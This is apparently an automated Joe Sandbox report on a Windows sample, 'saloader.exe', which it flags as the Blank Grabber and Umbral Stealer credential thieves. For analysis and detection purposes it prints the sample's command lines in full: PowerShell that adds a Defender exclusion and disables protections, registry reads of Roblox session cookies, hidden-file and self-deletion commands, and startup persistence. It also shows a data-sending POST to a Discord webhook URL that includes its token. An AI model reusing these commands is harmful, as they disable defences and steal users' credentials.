Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
saloader.exe

Overview

General Information

Sample name:saloader.exe
Analysis ID:1565502
MD5:1e10af7811808fc24065f18535cf1220
SHA1:65995bcb862aa66988e1bb0dbff75dcac9b400c7
SHA256:e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed
Tags:exeuser-aachum
Infos:

Detection

Blank Grabber, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • saloader.exe (PID: 520 cmdline: "C:\Users\user\Desktop\saloader.exe" MD5: 1E10AF7811808FC24065F18535CF1220)
    • attrib.exe (PID: 7256 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7308 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7636 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7840 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8048 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1352 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7264 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7380 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7444 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7696 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1920 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7732 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
saloader.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    saloader.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      saloader.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
          • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
          • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
          • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                    Click to see the 6 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.saloader.exe.2113d640000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      0.0.saloader.exe.2113d640000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        0.0.saloader.exe.2113d640000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                        • 0x31894:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                        • 0x31a1a:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                        • 0x31ab6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Disable Scan Feature
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7636, ProcessName: powershell.exe
                        Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                        Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7264, StartAddress: 2B6F32B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7264
                        Sigma detected: Suspicious Startup Folder Persistence
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe
                        Sigma detected: SCR File Write Event
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
                        Sigma detected: Suspicious Screensaver Binary File Creation
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\saloader.exe, ProcessId: 520, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FRc7Z.scr
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\saloader.exe", ParentImage: C:\Users\user\Desktop\saloader.exe, ParentProcessId: 520, ParentProcessName: saloader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe', ProcessId: 7308, ProcessName: powershell.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: saloader.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrReversingLabs: Detection: 78%
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrVirustotal: Detection: 81%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: saloader.exeReversingLabs: Detection: 78%
                        Source: saloader.exeVirustotal: Detection: 75%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                        Machine Learning detection for dropped file
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scrJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: saloader.exeJoe Sandbox ML: detected
                        Source: saloader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49813 version: TLS 1.2
                        Source: saloader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: global trafficDNS traffic detected: DNS query: discordapp.com
                        Source: unknownHTTP traffic detected: POST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discordapp.comContent-Length: 939Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 30 Nov 2024 01:30:03 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomainsx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732930205x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=BX4kI7Aq45FoNWq_RPBuj0TQviwCVhF8WSsGHJmfl.Y-1732930203-1.0.1.1-naczNhouxrOVdJppKEeMAwYsDG3xslKJi8usFy1ZtObLvPTpsTP6.RSLJkVGTsXd6GPQa3NRVGZ1aPdUt4lQWg; path=/; expires=Sat, 30-Nov-24 02:00:03 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utAiGLH4w22T4tKlph09QoYkB6UjvXL1X0iPPTk8YlHoVtxpSjvd7wmzHfXezhS7tdN9HCXx2UqgbRHMyWmRuNlUbsg43h9RkA2WfHiQegZWiWRcWK9Mm9OpVJoicj9H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 30 Nov 2024 01:30:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomainsx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732930208x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=aXbYGK.h78xwK59Y3zvJtf8zZItkbtguGaqrufqS5Dw-1732930207-1.0.1.1-PmG8kOKKAkIVtb4wQ0WSuJVmklrn60FZyzlev6m7NQ6A166jfFJVicTpcOJvPP3KlsQcjVCpiHSFRjvPTRfNQQ; path=/; expires=Sat, 30-Nov-24 02:00:07 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beVAM5BjnHJt4qYaBI7LVhsVatipCKIM7pkCxp3X2gpGcCB0rZLBaoUrHxdXCes%2FRqecfMqNxp3Nm4HTgWTmrnOuLZuINeodq5dszGmQ4Z4Um0mc%2FC525Ckt0Nn8qwFJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea711f969ac7cb1-EWR{"message": "Unknown Webhook", "code": 10015}
                        Source: powershell.exe, 00000013.00000002.1625690847.0000021A7E6B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                        Source: powershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoe
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discordapp.com
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113FA0F000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F9C8000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fiel
                        Source: saloader.exe, FRc7Z.scr.0.drString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: saloader.exe, FRc7Z.scr.0.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                        Source: powershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000009.00000002.1352472499.0000022DAEEFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co9
                        Source: powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: FRc7Z.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                        Source: saloader.exe, FRc7Z.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQS
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-Ste
                        Source: FRc7Z.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-Stealerx#
                        Source: powershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: saloader.exe, FRc7Z.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
